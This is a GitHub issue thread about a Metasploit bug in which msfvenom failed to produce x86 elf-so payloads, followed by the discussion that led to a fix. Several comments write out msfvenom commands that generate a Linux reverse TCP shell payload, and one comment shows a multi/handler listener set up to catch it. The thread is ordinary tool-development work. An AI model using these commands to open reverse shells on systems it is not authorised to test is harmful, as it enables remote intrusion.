Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Msfvenom fails to generate x86 elf-so payloads #7723

Closed
0x00string opened this issue Dec 17, 2016 · 11 comments

Comments

@0x00string
Copy link

commented Dec 17, 2016

Steps to reproduce

  1. Msfvenom -p linux/x86/shell_reverse_tcp -f elf-so

Expected behavior

An elf-so payload is produced, as with the x86_64 format and payload (linux/x64/shell_reverse_tcp -f elf-so)

Current behavior

The initial payload is generated, but no elf-so is generated.

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1337 PrependFork=true -f elf-so -o ELFSO
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 83 bytes
Error: The payload could not be generated, check options

Soz for poor report, I'm afk on a phone

@timwr

This comment has been minimized.

Copy link
Contributor

commented Dec 17, 2016

I can confirm this. I failed miserably at adding an armle template here: timwr@fa92d94. x86 might be easier

@wvu-r7 wvu-r7 self-assigned this Dec 21, 2016

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Dec 21, 2016

This works with x64. This works only with x64. I'm sorry.

@wvu-r7 wvu-r7 referenced this issue Dec 21, 2016
0 of 2 tasks complete
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Dec 21, 2016

See the linked PR I created and then immediately closed. Thanks.

@wvu-r7 wvu-r7 closed this Dec 21, 2016

@busterb

This comment has been minimized.

Copy link
Member

commented Dec 21, 2016

Yeah, agree @timwr, x86 doesn't look too bad, since the original template can be modified more readily with nasm. busterb@4768272

@wvu-r7 wvu-r7 reopened this Dec 21, 2016

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Dec 21, 2016

Reopening since we're close to having an x86 template.

@pr7031 pr7031 referenced this issue May 1, 2017
@Tikam02

This comment has been minimized.

Copy link

commented May 7, 2017

It works fine.

root@kali:# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.210.132 LPORT=1337 PrependFork=true -f elf-so -o ELFSO
root@kali:
#

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.210.132
lhost => 192.168.210.132
msf exploit(handler) > set lport 1337
lport => 1337
msf exploit(handler) > exploit

[] Started reverse TCP handler on 192.168.210.132:1337
[
] Starting the payload handler...

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 8, 2017

What works fine? Your example shows a Linux payload, but your handler shows a Windows payload.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 8, 2017

And you haven't shown any successful output. Please explain how the problem is fixed.

@busterb

This comment has been minimized.

Copy link
Member

commented May 8, 2017

I think @Tikam02 might have forgotten to PR the his work. Looking forward to it.

@0x00string

This comment has been minimized.

Copy link
Author

commented May 26, 2017

will close this after testing, but it seems to be generating a valid payload now! woohoo!

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 7, 2017

This is definitely done.

@wvu-r7 wvu-r7 closed this Jun 7, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
6 participants
You can’t perform that action at this time.